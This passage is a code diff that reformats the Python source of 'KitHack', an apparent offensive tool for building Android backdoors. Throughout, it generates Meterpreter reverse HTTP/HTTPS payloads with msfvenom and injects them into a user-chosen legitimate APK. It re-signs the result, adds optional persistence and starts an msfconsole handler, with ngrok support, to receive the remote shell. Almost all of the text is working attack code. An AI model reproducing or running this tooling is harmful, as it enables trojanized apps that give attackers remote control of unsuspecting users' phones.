-T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif m == '02': + elif m == "02": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LPORT={0} LHOST={1} R > output/payload.apk".format( + LPORT, LHOST + ) + ) location = os.getcwd() print( - "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + "{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( + APK, location + ) + ) print( - "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + os.system("apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif pay == '02': - print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + elif pay == "02": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) a = a.zfill(2) - if a == '01': + if a == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while ( + input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): break else: Tk().withdraw() icon = filedialog.askopenfilename( - title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", "*.*")), + ) print("\n{0}ICON: {1}".format(YELLOW, icon)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) file = open("/tmp/data.txt", "w") - file.write(icon + '\n') + file.write(icon + "\n") file.write(mainout) file.close() print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print( - "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/payload.apk".format( + LHOST, LPORT + ) + ) + print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/payload -o output/kithack.apk') + os.system("apktool b output/payload -o output/kithack.apk") location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/{2}.apk".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif a == '02': + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) print( - '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} Use the old Metasploit method'.format( - WHITE, YELLOW)) - print('{0}[02]{1} Use the new KitHack method'.format( - WHITE, YELLOW)) + "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) + ) + print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) - if m == '01': + if m == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk".format( + APK, LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif m == '02': + elif m == "02": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LPORT={0} LHOST={1} R > output/payload.apk".format( + LPORT, LHOST + ) + ) location = os.getcwd() print( - "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + "{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( + APK, location + ) + ) print( - "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + os.system("apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T 